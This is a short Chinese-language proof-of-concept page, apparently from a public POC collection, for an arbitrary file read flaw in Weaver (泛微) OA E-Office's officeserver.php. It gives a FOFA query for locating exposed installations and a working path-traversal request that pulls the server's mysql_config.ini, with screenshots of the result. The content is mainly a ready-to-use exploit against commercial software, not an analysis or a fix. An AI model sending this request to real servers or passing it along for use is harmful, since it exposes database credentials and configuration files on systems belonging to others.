Awesome-POC/OA产品漏洞/泛微OA E-Office officeserver.php 任意文件读取漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
532 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 泛微OA E-Office officeserver.php 任意文件读取漏洞
## 漏洞描述
泛微OA E-Office officeserver.php文件存在任意文件读取漏洞攻击者通过漏洞可以下载服务器上的任意文件
## 漏洞影响
```
泛微OA E-Office
```
## FOF
```
app="泛微-EOffice"
```
## 漏洞复现
登录页面
![image-20220520140739224](images/202205201407281.png)
验证POC
```
/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
```
![image-20220520140749985](images/202205201407034.png)